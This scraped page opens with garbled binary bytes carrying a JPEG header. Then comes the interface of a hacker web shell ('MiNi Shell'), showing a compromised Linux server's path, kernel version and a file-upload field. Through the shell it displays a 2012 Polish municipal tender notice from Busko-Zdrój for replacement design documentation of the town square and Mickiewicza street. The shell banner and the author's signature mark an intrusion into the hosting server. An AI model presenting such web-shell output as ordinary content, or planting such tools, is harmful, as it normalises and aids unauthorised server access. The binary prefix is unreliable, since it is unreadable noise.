JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120105/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120105/5108-N-2012.html

<p class="kh_header"><b>Busko-Zdrój: Wykonanie dokumentacji zamiennej  dla zadania pn.: Zmiana zagospodarowania terenu przestrzeni publicznej Pl. Zwycięstwa (Rynek) i północnego fragmentu ul. A.Mickiewicza w Busku-Zdroju autorstwa NOVAstudio</b><br>
<b>Numer ogłoszenia: 5108 - 2012; data zamieszczenia: 05.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji zamiennej  dla zadania pn.: Zmiana zagospodarowania terenu przestrzeni publicznej Pl. Zwycięstwa (Rynek) i północnego fragmentu ul. A.Mickiewicza w Busku-Zdroju autorstwa NOVAstudio.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na:
1.1. Wykonaniu dokumentacji budowlanej zamiennej w stosunku do projektów    
       budowlanych: 
- pn.: Zmiana zagospodarowania terenu przestrzeni publicznej Pl.Zwycięstwa (Rynek) i północnego fragmentu ul.A.Mickiewicza w Busku-Zdroju (branża: projekt zagospodarowania terenu, architektura  i projekt zieleni, sanitarna, inwentaryzacja zieleni i analiza  zieleni) autorstwa NOVAstudio z Katowic 
- pn.: Budowa sieci elektro-energetycznej na odcinku Pl.Zwycięstwa - Mickiewicza: - ul.Mickiewicza na odc.od ul.Kościuszki do Pl.Zwycięstwa   - Pl.Zwycięstwa - wzdłuż zach, pd, wsch.skrzydła rynku - skwer Marconiego - wnętrze skweru (branża elektryczna) autorstwa NOVAstudio z Katowic 
i projektu wykonawczego: Budowa kanalizacji deszczowej - Plac Zwycięstwa wzdłuż zach, pd, wsch skrzydła rynku (branża sanitarna) autorstwa NOVAstudio z Katowic 
celem uzyskania przez Zamawiającego zmiany pozwoleń na budowę (Decyzje: 
Nr 410/10 z dnia 01.10.2010r. oraz Nr 263/10 z dnia 13.07.2010r. - załącznik nr 7  
do SIWZ),
1.2. Wykonaniu projektów wykonawczych uszczegóławiających projekty budowlane celem realizacji przez Wykonawcę robót,
1.3. Opracowaniu przedmiaru robót i kosztorysu inwestorskiego z podziałem na branże - dla  w/w zadania,
1.4. Opracowaniu specyfikacji technicznej ogólnej wykonania i odbioru robót - dla w/w zadania.

Uwaga!
Projekty budowlane dla których Zamawiający uzyskał w.w pozwolenia na budowę stanowią załączniki nr 9-11 do SIWZ. Dokumentacja jest również do wglądu w pokoju nr 37 (II piętro) w siedzibie UMIG w Busku-Zdroju.
2.Dokumentacja projektowa zamienna powinna uwzględniać następujące wytyczne Zamawiającego:
2.1. Zmiany w stosunku do opracowanego projektu budowlanego autorstwa NOVAstudio z Katowic w zakresie zmiany zagospodarowania terenu oraz zmiany charakterystycznych parametrów terenu (w tym m.in.: zmiany nawierzchni, zmiany warstw konstrukcyjnych ciągów pieszo-jezdnych, zmiany w urządzeniu zieleni, w  lokalizacji elementów małej architektury, budowie schodów w północno-wschodnim i północno-zachodnim narożniku skweru, zmiany w lokalizacji oświetlenia):
A. w branży architektoniczno-konstrukcyjnej:
a)  maksymalne poszerzenie płyty rynku przeznaczonej do komunikacji (poprzez przesunięcie schodów we wschodniej i zachodniej części Placu Zwycięstwa w obszar parku). Przy alei po wschodniej stronie Rynku należy przesunąć schody, w celu zapewnienia min. szerokości przejścia (z uwagi na rosnące drzewa). Szerokość ta  nie powinna przekroczyć 1,50m
b)  wzdłuż pierzei wschodniej, zachodniej i południowej -  do wykończenia zastosować płyty granitowe. Szerokość pasa z granitu dostosować do linii wyznaczonej przez drzewa, biorąc pod uwagę względy techniczne (rozmiar zaproponowanych płyt granitowych),
c)  centralną część Skweru Marconiego (plac wokół fontanny) zaprojektować z w.w. płyt granitowych,
d)  aleje wewnętrzne oraz zewnętrzne Skweru Marconiego zaprojektować z kostki betonowej uszlachetnionej,
e)  przedłużenie Alei Mickiewicza tj. łącznik od ul.Kościuszki do Placu Zwycięstwa - powinien stanowić ciągłość zagospodarowania wykonywanej obecnie Alei Mickiewicza tzn. centralną częścią (zgodnie z pierwotnym projektem) - nawierzchnia asfaltowa o szerokości 3,5m; bezpośrednio przy budynkach po prawej i lewej stronie łącznika - opaska z kostki granitowej pochodzącej z odzysku; pomiędzy asfaltem a kostką granitową z odzysku - kostka betonowa uszlachetniona.
Powyższe elementy będą stanowić nawiązanie do wykończenia wykonywanej obecnie przez Zamawiającego Alei Mickiewicza.
f)  obrzeża przy alejach wewnętrznych i zewnętrznych Skweru Marconiego zaprojektować z kostki granitowej (o wymiarach ok.4x4cm) pochodzącej z prac rozbiórkowych. Zaprojektować pas obrzeża o szerokości ok.3-4 rzędów kostki,
g)  pas przeznaczony do ruchu (w tym kołowego) zaprojektować z kostki granitowej
 (o wymiarach większych niż. ok.4x4cm) pochodzącej z prac rozbiórkowych,
h)  skarpa po północnej stronie Rynku - z uwagi na jej znaczny spadek rozważyć możliwość zabezpieczenia np. poprzez zastosowanie palisady ochronnej,
i)  dostosowanie warstw podbudowy w ciągach pieszo-jezdnych do ruchu kołowego,
j)  weryfikacja koniecznych do usunięcia drzew w związku z nowym zagospodarowaniem terenu.
B. w branży elektrycznej:
a) przeprojektowanie oświetlenia w sposób zapewniający bezpieczne użytkowanie -  do Projektanta należy wykonanie obliczeń fotometrycznych w celu doboru właściwego rodzaju oświetlenia dla przedmiotowej przestrzeni publicznej (rozważyć należy możliwość oświetlenia z zastosowaniem lampy z dwoma rodzajami opraw skierowanymi w różne strony).
C. w branży instalacyjnej:
a) dostosowanie zaprojektowanych oraz już wybudowanych wpustów ulicznych do nowego zagospodarowania terenu. W związku z wykonaniem odwodnienia po wschodniej, zachodniej i północnej stronie Placu Zwycięstwa do Projektanta należy wykonanie inwentaryzacji wykonanego odwodnienia
2.2.  Koszt robót wykonanych na podstawie projektu zamiennego nie powinien przekroczyć kwoty 5 mln złotych brutto. W związku z powyższym podczas prowadzenia prac projektowych należy przeprowadzić analizę doboru materiałów (w tym pochodzących z rozbiórki) biorąc pod uwagę wymagania podmiotów uzgadniających projekt oraz możliwości finansowe dot. przedmiotowego zadania.
Zamawiający dysponuje kostką granitową pochodzącą z rozbiórki Alei Mickiewicza o  różnych rozmiary (od 4x4cm do 8x10cm). 
Kostka jest zeskładowana w workach big-bag w odległości ok.4km od miejsca wbudowania. W kosztach należy uwzględnić więc transport kostki w miejsce wbudowania oraz jej oczyszczenie z resztek asfaltu i betonu.
2.3.  Projektant na etapie sporządzania dokumentacji projektowej zamiennej zobowiązany jest do zorganizowania spotkania/spotkań roboczych w siedzibie Zamawiającego, w celu omówienia przyjętych rozwiązań projektowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.24.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 105.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 usługi projektowej polegającej na opracowaniu dokumentacji projektowej budowlano-wykonawczej na zagospodarowanie terenu wpisanego do rejestru zabytków (np. jako układ urbanistyczny) o powierzchni minimum 0,6 ha z podaniem przedmiotu zamówienia, podmiotu zlecającego prace, daty wykonania i numeru w rejestrze zabytków stosownego województwa, oraz załączeniem referencji wystawionych przez Zleceniodawcę potwierdzającego, że usługa ta została wykonana należycie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy z wykorzystaniem wzoru wg Załącznika 1</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje okoliczności i warunki zmiany postanowień zawartej umowy.
1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.
2.  Zmiana postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy może nastąpić w przypadku:
a)wystąpienia ograniczenia zakresu przedmiotu umowy w stosunku do treści Oferty, na podstawie której dokonano wyboru Wykonawcy;
b)wystąpienia nieistotnych zmian tj. zmian, które nie mają wpływu na tzw. konieczne warunki Umowy ( termin, zakres, wartość Umowy).
3. Zmiana terminu wykonania przedmiotu umowy w stosunku do treści Oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadkach gdy: 
a)opóźnienie terminu wykonania przedmiotu Umowy nie jest zależne od Wykonawcy t.j. termin uzyskania wszelkich opinii, uzgodnień oraz decyzji administracyjnych. Termin ten zostaje wówczas przedłużony o czas otrzymania w/w dokumentów.
b)wystąpi konieczność uzyskania od organów administracji państwowej dodatkowych decyzji, uzgodnień, pozwoleń, niezbędnych do realizacji zadania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój, pok. nr 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.01.2012 godzina 10:00, miejsce: Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój, pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com